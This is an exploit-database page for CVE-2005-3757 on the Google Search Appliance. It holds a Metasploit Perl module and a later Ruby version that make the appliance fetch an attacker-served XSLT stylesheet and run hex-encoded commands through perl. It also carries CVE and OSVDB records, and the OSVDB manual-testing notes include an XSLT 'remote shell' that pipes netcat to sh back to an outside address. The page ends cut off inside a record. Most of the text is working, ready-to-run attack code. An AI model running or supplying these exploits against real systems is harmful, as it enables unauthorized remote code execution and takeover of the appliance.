Google Search Appliance proxystylesheet XSLT Java Code Execution
2005-11-20T00:00:00
ID EDB-ID:1333 Type exploitdb Reporter H D Moore Modified 2005-11-20T00:00:00
Description
Google Search Appliance proxystylesheet XSLT Java Code Execution. CVE-2005-3757. Remote exploit for hardware platform
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::google_proxystylesheet_exec;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket;
use IO::Select;
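my $advanced = { };

# Module metadata consumed by the framework. 'Refs' carries every public
# identifier for this issue (OSVDB 20981, CVE-2005-3757, BID 15509) so the
# module can be located by any of them; the original listing only named OSVDB.
my $info =
{
	'Name'    => 'Google Appliance ProxyStyleSheet Command Execution',
	'Version' => '$Revision: 1.1 $',
	'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],

	'Description' =>
		Pex::Text::Freeform(qq{
			This module exploits a feature in the Saxon XSLT parser used by
		the Google Search Appliance. This feature allows for arbitrary
		java methods to be called. Google released a patch and advisory to
		their client base in August of 2005 (GA-2005-08-m). The target appliance
		must be able to connect back to your machine for this exploit to work.
		}),

	'Arch' => [ ],
	'OS'   => [ ],
	'Priv' => 0,

	# HTTPHOST/HTTPPORT describe the local listener the appliance fetches the
	# stylesheet from. HTTPADDR is the address written into the proxystylesheet
	# URL; it only needs to be set when the appliance cannot reach the address
	# we would otherwise derive from our route to RHOST (NAT, multi-homed hosts).
	'UserOpts' =>
		{
			'RHOST'    => [ 1, 'HOST', 'The address of the Google appliance'],
			'RPORT'    => [ 1, 'PORT', 'The port used by the search interface', 80],
			'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
			'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
			'HTTPADDR' => [ 0, 'HOST', 'The address that can be used to connect back to this system'],
		},

	# The payload is a unix command string; it is hex-encoded before being
	# embedded in the XSLT, so quoting and whitespace inside it are irrelevant.
	'Payload' =>
		{
			'Space' => 1024,
			'Keys'  => [ 'cmd' ],
		},

	'Refs' =>
		[
			['OSVDB', 20981],
			['CVE',   '2005-3757'],
			['BID',   15509],
		],

	'DefaultTarget' => 0,
	'Targets' =>
		[
			[ 'Google Search Appliance']
		],
	'Keys' => [ 'google' ],

	'DisclosureDate' => 'Aug 16 2005',
};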
sub new
{
	my ($class, @args) = @_;

	# Hand the module metadata to the base class; any caller-supplied
	# arguments are passed through to it untouched.
	my $self = $class->SUPER::new(
		{
			'Info'     => $info,
			'Advanced' => $advanced,
		},
		@args
	);

	return $self;
}
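sub Check {
	my $self = shift;

	my $s = $self->ConnectSearch;
	if (! $s) {
		return $self->CheckCode('Connect');
	}

	# Point proxystylesheet at a random, non-existent hostname. An unpatched
	# appliance tries to resolve that name and reports the resolver failure in
	# its error page; that text is our vulnerability indicator, and it lets us
	# check without exposing a listener of our own.
	my $url =
		"/search?client=". Pex::Text::AlphaNumText(int(rand(15))+1). "&".
		"site=".Pex::Text::AlphaNumText(int(rand(15))+1)."&".
		"output=xml_no_dtd&".
		"q=".Pex::Text::AlphaNumText(int(rand(15))+1)."&".
		"proxystylesheet=http://".Pex::Text::AlphaNumText(int(rand(32))+1)."/";

	$s->Send("GET $url HTTP/1.0\r\n\r\n");
	my $page = $s->Recv(-1, 5);
	$s->Close;

	# Recv() may return nothing on a timeout; match against an empty string
	# rather than undef so a silent appliance is reported as safe, not as a
	# warning from the pattern match.
	$page = '' if (! defined($page));

	if ($page =~ /cannot be resolved to an ip address/) {
		$self->PrintLine("[*] This system appears to be vulnerable >:-)");
		return $self->CheckCode('Confirmed');
	}

	# A patched appliance refuses the stylesheet without trying to fetch it.
	if ($page =~ /ERROR: Unable to fetch the stylesheet/) {
		$self->PrintLine("[*] This system appears to be patched");
		return $self->CheckCode('Safe');
	}

	$self->PrintLine("[*] This system does not appear to be vulnerable");
	return $self->CheckCode('Safe');
}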
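sub Exploit
{
	my $self = shift;
	my ($s, $page);

	# Request the index page; the appliance answers with a redirect whose
	# Location header carries the site and client values we must reuse.
	$s = $self->ConnectSearch || return;
	$s->Send("GET / HTTP/1.0\r\n\r\n");
	$page = $s->Recv(-1, 5);
	$s->Close;
	$page = '' if (! defined($page));

	# Parse the redirect to get the client and site values
	my ($goog_site, $goog_clnt) = $page =~ m/^location.*site=([^\&]+)\&.*client=([^\&]+)\&/im;
	if (! $goog_site || ! $goog_clnt) {
		# Keep going with placeholder values rather than abort: an appliance
		# that does not redirect may still accept the search request.
		$self->PrintLine("[*] Invalid response to our request, is this a Google appliance?");
		$self->PrintLine("[*] Falling back to placeholder site/client values");
		$goog_site = 'test';
		$goog_clnt = 'test';
	}

	# Create the listening local socket that will act as our HTTP server.
	# It accepts a connection from *any* client, not only the appliance, and
	# the first connection is the one served; the peer is logged below.
	my $lis = IO::Socket::INET->new(
			LocalHost => $self->GetVar('HTTPHOST'),
			LocalPort => $self->GetVar('HTTPPORT'),
			ReuseAddr => 1,
			Listen    => 1,
			Proto     => 'tcp');

	if (not defined($lis)) {
		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
		return;
	}
	my $sel = IO::Select->new($lis);

	# Send a search request with our own address in the proxystylesheet
	# parameter. HTTPADDR overrides the address derived from our route to
	# RHOST; proxyreload=1 asks the appliance to fetch the stylesheet afresh.
	my $query = Pex::Text::AlphaNumText(int(rand(32))+1);

	my $proxy =
		"http://".
		($self->GetVar('HTTPADDR') || Pex::Utils::SourceIP($self->GetVar('RHOST'))).
		":".$self->GetVar('HTTPPORT')."/".Pex::Text::AlphaNumText(int(rand(15))+1).".xsl";

	my $url =
		"/search?client=". $goog_clnt ."&site=". $goog_site .
		"&output=xml_no_dtd&proxystylesheet=". $proxy .
		"&q=". $query ."&proxyreload=1";

	$self->PrintLine("[*] Sending our malicious search request...");
	$s = $self->ConnectSearch;
	if (! $s) {
		# Do not leave the listener bound when the request cannot be sent.
		$lis->close;
		return;
	}
	$s->Send("GET $url HTTP/1.0\r\n\r\n");
	$page = $s->Recv(-1, 3);
	$s->Close;

	$self->PrintLine("[*] Listening for connections to http://" . $self->GetVar('HTTPHOST') . ":" . $self->GetVar('HTTPPORT') . " ...");

	# Did we receive a connection?
	my @r = $sel->can_read(30);

	if (! @r) {
		$self->PrintLine("[*] No connection received from the search engine, possibly patched.");
		$lis->close;
		return;
	}

	my $c = $lis->accept();
	if (! $c) {
		$self->PrintLine("[*] No connection received from the search engine, possibly patched.");
		$lis->close;
		return;
	}

	my $cli  = Msf::Socket::Tcp->new_from_socket($c);
	my $peer = $cli->PeerAddr;
	$self->PrintLine("[*] Connection received from $peer...");

	# The appliance may legitimately connect from another address (proxy,
	# NAT), so only warn; the operator can decide whether this was expected.
	if ($peer ne $self->GetVar('RHOST')) {
		$self->PrintLine("[*] Warning: peer address differs from RHOST, the stylesheet and payload are served to it anyway");
	}

	$self->ProcessHTTP($cli);

	# Only one stylesheet fetch is expected; release the port.
	$lis->close;
	return;
}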
sub ConnectSearch {
	my $self = shift;

	# Open a TCP (optionally SSL-wrapped) connection to the appliance's
	# search interface; returns nothing on failure after reporting the error.
	my @conn_args = (
		'PeerAddr' => $self->GetVar('RHOST'),
		'PeerPort' => $self->GetVar('RPORT'),
		'SSL'      => $self->GetVar('SSL'),
	);
	my $sock = Msf::Socket::Tcp->new(@conn_args);

	return $sock unless $sock->IsError;

	$self->PrintLine('[*] Error creating socket: ' . $sock->GetError);
	return;
}
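sub ProcessHTTP
{
	my ($self, $cli) = @_;

	# Read the first line of the HTTP request so the appliance's request is
	# consumed before we answer. The requested path is not checked: whatever
	# is asked for, the XSLT template is returned.
	my $reqline = $cli->RecvLine(10);
	$reqline = '' if (! defined($reqline));
	my ($cmd, $url, $proto) = split(/ /, $reqline);

	# The way we call Runtime.getRuntime().exec, Java will split
	# our string on whitespace. Since we are injecting via XSLT,
	# inserting quotes becomes a huge pain, so the raw payload is
	# hex-encoded and decoded by perl on the appliance: the resulting
	# command line contains no whitespace, quotes or XML-significant
	# characters, and no shell is involved in running it.
	my $exec_str =
		'/usr/bin/perl -e system(pack(qq{H*},qq{' .
		unpack("H*", $self->GetVar('EncodedPayload')->RawPayload).
		'}))';

	# Load the template from our data section, we have to manually
	# seek and reposition to allow the exploit to be used more
	# than once without a reload. The template must follow a __DATA__
	# marker at the end of this file; this listing does not show one.
	my $content = '';
	seek(DATA, 0, 0);
	while(<DATA>) { last if /^__DATA__$/ }
	while(<DATA>) { $content .= $_ }

	if ($content eq '') {
		$self->PrintLine("[-] No XSLT template found after __DATA__, nothing to send");
		$cli->Close;
		return;
	}

	# Insert our command line in place of the template placeholder
	$content =~ s/:x:MSF:x:/$exec_str/;

	# Send it to the requesting appliance
	my $rhost = $cli->PeerAddr;
	$self->PrintLine("[*] HTTP Client connected from $rhost, sending XSLT...");

	my $res = "HTTP/1.1 200 OK\r\n" .
	 "Content-Type: text/html\r\n" .
	 "Content-Length: " . length($content) . "\r\n" .
	 "Connection: close\r\n" .
	 "\r\n" .
	 $content;

	$self->PrintLine("[*] Sending ".length($res)." bytes...");
	$cli->Send($res);
	$cli->Close;
	return;
}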
1;
# milw0rm.com [2005-11-20]
{"id": "EDB-ID:1333", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Google Search Appliance proxystylesheet XSLT Java Code Execution", "description": "Google Search Appliance proxystylesheet XSLT Java Code Execution. CVE-2005-3757. Remote exploit for hardware platform", "published": "2005-11-20T00:00:00", "modified": "2005-11-20T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/1333/", "reporter": "H D Moore", "references": [], "cvelist": ["CVE-2005-3757"], "lastseen": "2016-01-31T14:01:32", "viewCount": 16, "enchantments": {"score": {"value": 6.7, "vector": "NONE", "modified": "2016-01-31T14:01:32", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-3757"]}, {"type": "osvdb", "idList": ["OSVDB:20981"]}, {"type": "exploitdb", "idList": ["EDB-ID:16907"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82357"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/WEBAPP/GOOGLE_PROXYSTYLESHEET_EXEC"]}, {"type": "nessus", "idList": ["GOOGLE_SEARCH_APPLIANCE_PROXYSTYLESHEET.NASL"]}], "modified": "2016-01-31T14:01:32", "rev": 2}, "vulnersScore": 6.7}, "sourceHref": "https://www.exploit-db.com/download/1333/", "sourceData": "##\n# This file is part of the Metasploit Framework and may be redistributed\n# according to the licenses defined in the Authors field below. In the\n# case of an unknown or missing license, this file defaults to the same\n# license as the core Framework (dual GPLv2 and Artistic). 
The latest\n# version of the Framework can always be obtained from metasploit.com.\n##\n\npackage Msf::Exploit::google_proxystylesheet_exec;\n\nuse strict;\nuse base \"Msf::Exploit\";\nuse Pex::Text;\nuse IO::Socket;\nuse IO::Select;\nmy $advanced = { };\n\nmy $info =\n{\n\t'Name' => 'Google Appliance ProxyStyleSheet Command Execution',\n\t'Version' => '$Revision: 1.1 $',\n\t'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],\n\t\n\t'Description' => \n\t\tPex::Text::Freeform(qq{\n\t\t\tThis module exploits a feature in the Saxon XSLT parser used by\n\t\tthe Google Search Appliance. This feature allows for arbitrary\n\t\tjava methods to be called. Google released a patch and advisory to \n\t\ttheir client base in August of 2005 (GA-2005-08-m). The target appliance\n\t\tmust be able to connect back to your machine for this exploit to work.\n\t\t}),\n\t\t\n\t'Arch' => [ ],\n\t'OS' => [ ],\n\t'Priv' => 0,\n\t'UserOpts' => \n\t\t{\n\t\t\t'RHOST' => [ 1, 'HOST', 'The address of the Google appliance'],\n\t\t\t'RPORT' => [ 1, 'PORT', 'The port used by the search interface', 80],\n\t\t\t'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],\n\t\t\t'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', \"0.0.0.0\" ],\n\t\t\t'HTTPADDR' => [ 0, 'HOST', 'The address that can be used to connect back to this system'],\n\t\t},\n\t'Payload' => \n\t\t{\n\t\t\t'Space' => 1024,\n\t\t\t'Keys' => [ 'cmd' ],\n\t\t},\n\t'Refs' => \n\t\t[\n\t\t\t['OSVDB', 20981],\n\t\t],\n\t'DefaultTarget' => 0,\n\t'Targets' =>\n\t\t[\n\t\t\t[ 'Google Search Appliance']\n\t\t],\n\t'Keys' => [ 'google' ],\n\n\t'DisclosureDate' => 'Aug 16 2005',\n};\n\nsub new\n{\n\tmy $class = shift;\n\tmy $self;\n\t\n\t$self = $class->SUPER::new(\n\t\t\t{ \n\t\t\t\t'Info' => $info,\n\t\t\t\t'Advanced' => $advanced,\n\t\t\t},\n\t\t\t@_);\n\n\treturn $self;\n}\n\nsub Check {\n\tmy $self = shift;\n\tmy $s = $self->ConnectSearch;\n\t\n\tif (! 
$s) {\n\t\treturn $self->CheckCode('Connect');\n\t}\n\t\n\tmy $url =\n\t\t\"/search?client=\". Pex::Text::AlphaNumText(int(rand(15))+1). \"&\".\n\t\t\"site=\".Pex::Text::AlphaNumText(int(rand(15))+1).\"&\".\n\t\t\"output=xml_no_dtd&\".\n\t\t\"q=\".Pex::Text::AlphaNumText(int(rand(15))+1).\"&\".\n\t\t\"proxystylesheet=http://\".Pex::Text::AlphaNumText(int(rand(32))+1).\"/\";\n\t\n\t$s->Send(\"GET $url HTTP/1.0\\r\\n\\r\\n\");\n\tmy $page = $s->Recv(-1, 5);\n\t$s->Close;\n\n\tif ($page =~ /cannot be resolved to an ip address/) {\n\t\t$self->PrintLine(\"[*] This system appears to be vulnerable >:-)\");\n\t\treturn $self->CheckCode('Confirmed');\n\t}\n\t\n\tif ($page =~ /ERROR: Unable to fetch the stylesheet/) {\n\t\t$self->PrintLine(\"[*] This system appears to be patched\");\n\t}\n\t\n\t$self->PrintLine(\"[*] This system does not appear to be vulnerable\");\n\treturn $self->CheckCode('Safe');\t\n}\n\n\nsub Exploit\n{\n\tmy $self = shift;\n\tmy ($s, $page);\n\t\n\t# Request the index page to obtain a redirect response\n\t$s = $self->ConnectSearch || return;\n\t$s->Send(\"GET / HTTP/1.0\\r\\n\\r\\n\");\n\t$page = $s->Recv(-1, 5);\n\t$s->Close;\n\n\t# Parse the redirect to get the client and site values\n\tmy ($goog_site, $goog_clnt) = $page =~ m/^location.*site=([^\\&]+)\\&.*client=([^\\&]+)\\&/im;\n\tif (! $goog_site || ! $goog_clnt) {\n\t\t$self->PrintLine(\"[*] Invalid response to our request, is this a Google appliance?\");\n\t\t#$self->PrintLine($page);\n\t\t#!!! return;\n\t\t$goog_site = 'test';\n\t\t$goog_clnt = 'test';\n\t}\n\n\t# Create the listening local socket that will act as our HTTP server\n\tmy $lis = IO::Socket::INET->new(\n\t\t\tLocalHost => $self->GetVar('HTTPHOST'),\n\t\t\tLocalPort => $self->GetVar('HTTPPORT'),\n\t\t\tReuseAddr => 1,\n\t\t\tListen => 1,\n\t\t\tProto => 'tcp');\n\t\n\tif (not defined($lis)) {\n\t\t$self->PrintLine(\"[-] Failed to create local HTTP listener on \" . 
$self->GetVar('HTTPPORT'));\n\t\treturn;\n\t}\n\tmy $sel = IO::Select->new($lis);\n\t\n\t# Send a search request with our own address in the proxystylesheet parameter\n\tmy $query = Pex::Text::AlphaNumText(int(rand(32))+1);\n\t\n\tmy $proxy =\n\t\t\"http://\".\n\t\t($self->GetVar('HTTPADDR') || Pex::Utils::SourceIP($self->GetVar('RHOST'))).\n\t\t\":\".$self->GetVar('HTTPPORT').\"/\".Pex::Text::AlphaNumText(int(rand(15))+1).\".xsl\";\n\t\n\tmy $url = \n\t\t\"/search?client=\". $goog_clnt .\"&site=\". $goog_site .\n\t\t\"&output=xml_no_dtd&proxystylesheet=\". $proxy .\n\t\t\"&q=\". $query .\"&proxyreload=1\";\n\n\t$self->PrintLine(\"[*] Sending our malicious search request...\");\n\t$s = $self->ConnectSearch || return;\n\t$s->Send(\"GET $url HTTP/1.0\\r\\n\\r\\n\");\n\t$page = $s->Recv(-1, 3);\n\t$s->Close;\n\n\t$self->PrintLine(\"[*] Listening for connections to http://\" . $self->GetVar('HTTPHOST') . \":\" . $self->GetVar('HTTPPORT') . \" ...\");\n\t\n\t# Did we receive a connection?\n\tmy @r = $sel->can_read(30);\n\t\n\tif (! @r) {\n\t\t$self->PrintLine(\"[*] No connection received from the search engine, possibly patched.\");\n\t\t$lis->close;\n\t\treturn;\n\t}\n\n\tmy $c = $lis->accept();\n\tif (! $c) {\n\t\t$self->PrintLine(\"[*] No connection received from the search engine, possibly patched.\");\n\t\t$lis->close;\n\t\treturn;\t\n\t}\n\n\tmy $cli = Msf::Socket::Tcp->new_from_socket($c);\n\t$self->PrintLine(\"[*] Connection received from \".$cli->PeerAddr.\"...\");\t\n\t$self->ProcessHTTP($cli);\n\treturn;\n}\n\nsub ConnectSearch {\n\tmy $self = shift;\n\tmy $s = Msf::Socket::Tcp->new(\n\t\t'PeerAddr' => $self->GetVar('RHOST'),\n\t\t'PeerPort' => $self->GetVar('RPORT'),\n\t\t'SSL' => $self->GetVar('SSL')\n\t);\n\t\n\tif ($s->IsError) {\n\t\t$self->PrintLine('[*] Error creating socket: ' . 
$s->GetError);\n\t\treturn;\n\t}\n\treturn $s;\n}\n\nsub ProcessHTTP\n{\n\tmy $self = shift;\n\tmy $cli = shift;\n\tmy $targetIdx = $self->GetVar('TARGET');\n\tmy $target = $self->Targets->[$targetIdx];\n\tmy $ret = $target->[1];\n\tmy $shellcode = $self->GetVar('EncodedPayload')->Payload;\n\tmy $content;\n\tmy $rhost;\n\tmy $rport;\n\n\t# Read the first line of the HTTP request\n\tmy ($cmd, $url, $proto) = split(/ /, $cli->RecvLine(10));\n\n\t# The way we call Runtime.getRuntime().exec, Java will split\n\t# our string on whitespace. Since we are injecting via XSLT,\n\t# inserting quotes becomes a huge pain, so we do this...\n\tmy $exec_str = \n\t\t'/usr/bin/perl -e system(pack(qq{H*},qq{' .\n\t\tunpack(\"H*\", $self->GetVar('EncodedPayload')->RawPayload).\n\t\t'}))';\n\n\t# Load the template from our data section, we have to manually\n\t# seek and reposition to allow the exploit to be used more\n\t# than once without a reload.\n\tseek(DATA, 0, 0);\n\twhile(<DATA>) { last if /^__DATA__$/ }\n\twhile(<DATA>) {\t$content .= $_ }\n\n\t# Insert our command line\n\t$content =~ s/:x:MSF:x:/$exec_str/;\n\t\n\t# Send it to the requesting appliance\n\t$rport = $cli->PeerPort;\n\t$rhost = $cli->PeerAddr;\n\t$self->PrintLine(\"[*] HTTP Client connected from $rhost, sending XSLT...\");\n\t\n\tmy $res = \"HTTP/1.1 200 OK\\r\\n\" .\n\t \"Content-Type: text/html\\r\\n\" .\n\t \"Content-Length: \" . length($content) . \"\\r\\n\" .\n\t \"Connection: close\\r\\n\" .\n\t \"\\r\\n\" .\n\t $content;\n\n\t$self->PrintLine(\"[*] Sending \".length($res).\" bytes...\");\n\t$cli->Send($res);\n\t$cli->Close;\n}\n\n1;\n\n# milw0rm.com [2005-11-20]\n", "osvdbidlist": ["20981"]}
{"cve": [{"lastseen": "2020-10-03T11:34:57", "description": "The Saxon XSLT parser in Google Mini Search Appliance, and possibly Google Search Appliance, allows remote attackers to obtain sensitive information and execute arbitrary code via dangerous Java class methods in select attribute of xsl:value-of tags in XSLT style sheets, such as (1) system-property, (2) sys:getProperty, and (3) run:exec.", "edition": 3, "cvss3": {}, "published": "2005-11-22T21:03:00", "title": "CVE-2005-3757", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2005-3757"], "modified": "2018-10-19T15:39:00", "cpe": ["cpe:/h:google:search_appliance:*", "cpe:/h:google:mini_search_appliance:*"], "id": "CVE-2005-3757", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3757", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:h:google:search_appliance:*:*:*:*:*:*:*:*", "cpe:2.3:h:google:mini_search_appliance:*:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:15:03", "description": "", "published": "2009-10-30T00:00:00", "type": "packetstorm", "title": "Google Appliance ProxyStyleSheet Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3757"], "modified": "2009-10-30T00:00:00", "id": "PACKETSTORM:82357", "href": "https://packetstormsecurity.com/files/82357/Google-Appliance-ProxyStyleSheet-Command-Execution.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be 
subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Google Appliance ProxyStyleSheet Command Execution', \n'Description' => %q{ \nThis module exploits a feature in the Saxon XSLT parser used by \nthe Google Search Appliance. This feature allows for arbitrary \njava methods to be called. Google released a patch and advisory to \ntheir client base in August of 2005 (GA-2005-08-m). The target appliance \nmust be able to connect back to your machine for this exploit to work. \n}, \n'Author' => [ 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2005-3757'], \n['OSVDB', '20981'], \n['BID', '15509'], \n], \n'Privileged' => false, \n'Payload' => \n{ \n'DisableNops' => true, \n'Space' => 4000, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl bash telnet netcat-e', \n} \n}, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Targets' => [[ 'Automatic', { }]], \n'DisclosureDate' => 'Aug 16 2005', \n'Stance' => Msf::Exploit::Stance::Aggressive, \n'DefaultTarget' => 0)) \nend \n \n# Handle incoming requests from the appliance \ndef on_request_uri(cli, request) \n \nprint_status(\"Handling new incoming HTTP request...\") \n \npath = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"google_proxystylesheet.xml\") \n \nfd = File.open(path, \"r\") \ndata = fd.read \nfd.close \n \nexec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' + payload.encoded.unpack(\"H*\")[0] + '}))' \ndata.gsub!(/:x:MSF:x:/, exec_str) \nsend_response(cli, data) \nend \n \ndef check \nres = send_request_cgi({ \n'uri' => '/search', \n'vars_get' => 
\n{ \n'client' => rand_text_alpha(rand(15)+1), \n'site' => rand_text_alpha(rand(15)+1), \n'output' => 'xml_no_dtd', \n'q' => rand_text_alpha(rand(15)+1), \n'proxystylesheet' => 'http://' + rand_text_alpha(rand(15)+1) + '/' \n} \n}, 10) \n \nif (res and res.body =~ /cannot be resolved to an ip address/) \nprint_status(\"This system appears to be vulnerable\") \nreturn Exploit::CheckCode::Vulnerable \nend \n \nif (res and res.body =~ /ERROR: Unable to fetch the stylesheet/) \nprint_status(\"This system appears to be patched\") \nend \n \nprint_status(\"This system is not exploitable\") \nreturn Exploit::CheckCode::Safe \nend \n \n \ndef exploit \n \nprint_status(\"Obtaining the appliance site and client IDs...\") \n# Send a HTTP/1.0 request to learn the site configuration \nres = send_request_raw({ \n'uri' => '/', \n'version' => '1.0' \n}, 10) \n \nif !(res and res['location'] and res['location'] =~ /site=/) \nprint_status(\"Could not read the location header: #{res.code} #{res.message}\") \nreturn \nend \n \nm = res['location'].match(/site=([^\\&]+)\\&.*client=([^\\&]+)\\&/im) \nif !(m and m[1] and m[2]) \nprint_status(\"Invalid location header: #{res['location']}\") \nreturn \nend \n \nprint_status(\"Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...\") \nstart_service \n \nprint_status(\"Requesting a search using our custom XSLT...\") \nres = send_request_cgi({ \n'uri' => '/search', \n'vars_get' => \n{ \n'client' => m[2], \n'site' => m[1], \n'output' => 'xml_no_dtd', \n'q' => rand_text_alpha(rand(15)+1), \n'proxystylesheet' => \"http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml\", \n'proxyreload' => '1' \n} \n}, 25) \n \nif (res) \nprint_status(\"The server returned: #{res.code} #{res.message}\") \nprint_status(\"Waiting on the payload to execute...\") \nsleep(20) \nelse \nprint_status(\"No response from the server\") \nend \n \nprint_status(\"Shutting down the web service...\") 
\nstop_service \nend \n \nend \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82357/google_proxystylesheet_exec.rb.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:20:18", "bulletinFamily": "software", "cvelist": ["CVE-2005-3757"], "edition": 1, "description": "## Vulnerability Description\nThe Google Search Appliance contains a flaw that allows a remote attacker to execute arbitrary Java methods as an unprivileged user. The issue is due to the proxystylesheet parameter in the search request, which loads an external XSLT style sheet from a URL. The XSLT parser is based on Saxon, which allows Java method calls from within an XSLT document. This allows an attacker to execute arbitrary code and commands on the appliance.\n## Solution Description\nUpgrade to the version specified by Google advisory GA-2005-08-m, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nThe Google Search Appliance contains a flaw that allows a remote attacker to execute arbitrary Java methods as an unprivileged user. The issue is due to the proxystylesheet parameter in the search request, which loads an external XSLT style sheet from a URL. The XSLT parser is based on Saxon, which allows Java method calls from within an XSLT document. This allows an attacker to execute arbitrary code and commands on the appliance.\n## Manual Testing Notes\nReplace the proxystylesheet variable in the search URL with a URL to a malicious XSLT style sheet. 
This style sheet should contain a block like:\n\n<!-- Google Appliance Remote Shell ;-) -->\n\nXSLT Version: <xsl:value-of select=\"system-property('xsl:version')\"/> <br />\nXSLT Vendor: <xsl:value-of select=\"system-property('xsl:vendor')\" /> <br />\nXSLT URL: <xsl:value-of select=\"system-property('xsl:vendor-url')\" /> <br />\nOS: <xsl:value-of select=\"sys:getProperty('os.name')\" /> <br />\nVersion: <xsl:value-of select=\"sys:getProperty('os.version')\" /> <br />\nArch: <xsl:value-of select=\"sys:getProperty('os.arch')\" /> <br />\nUserName: <xsl:value-of select=\"sys:getProperty('user.name')\" /> <br />\nUserHome: <xsl:value-of select=\"sys:getProperty('user.home')\" /> <br />\nUserDir: <xsl:value-of select=\"sys:getProperty('user.dir')\" /> <br />\n\nExecuting command...<br />\n<xsl:value-of select=\"run:exec(run:getRuntime(), 'sh -c nc$255.255.255.255$53|sh|nc$255.255.255.255$53')\" />\n\n<xsl:text disable-output-escaping=\"yes\">\n## References:\nSecurity Tracker: 1015246\n[Secunia Advisory ID:17644](https://secuniaresearch.flexerasoftware.com/advisories/17644/)\n[Related OSVDB ID: 20979](https://vulners.com/osvdb/OSVDB:20979)\n[Related OSVDB ID: 20980](https://vulners.com/osvdb/OSVDB:20980)\n[Related OSVDB ID: 20978](https://vulners.com/osvdb/OSVDB:20978)\n[Related OSVDB ID: 20977](https://vulners.com/osvdb/OSVDB:20977)\nOther Advisory URL: http://metasploit.com/research/vulns/google_proxystylesheet/\nNews Article: http://www.techworld.com/networking/news/index.cfm?NewsID=4840\nNews Article: http://www.webpronews.com/insiderreports/searchinsider/wpn-49-20051122GoogleMiniNeededBigSecurityPatch.html\nNews Article: http://news.techwhack.com/2526/221129-google-fixes-security-flaws-in-google-mini/\nNews Article: http://www.eweek.com/article2/0,1895,1891796,00.asp\nGeneric Exploit URL: http://metasploit.com/projects/Framework/link.php?type=exploit&vers=2&name=google_proxystylesheet_exec\nFrSIRT Advisory: 
ADV-2005-2500\n[CVE-2005-3757](https://vulners.com/cve/CVE-2005-3757)\nBugtraq ID: 15509\n", "modified": "2005-11-21T00:00:00", "published": "2005-11-21T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:20981", "id": "OSVDB:20981", "title": "Google Search Appliance proxystylesheet XSLT Java Code Execution", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T06:47:39", "description": "Google Appliance ProxyStyleSheet Command Execution. CVE-2005-3757. Webapps exploit for hardware platform", "published": "2010-07-01T00:00:00", "type": "exploitdb", "title": "Google Appliance ProxyStyleSheet Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3757"], "modified": "2010-07-01T00:00:00", "id": "EDB-ID:16907", "href": "https://www.exploit-db.com/exploits/16907/", "sourceData": "##\r\n# $Id: google_proxystylesheet_exec.rb 9653 2010-07-01 23:33:07Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# 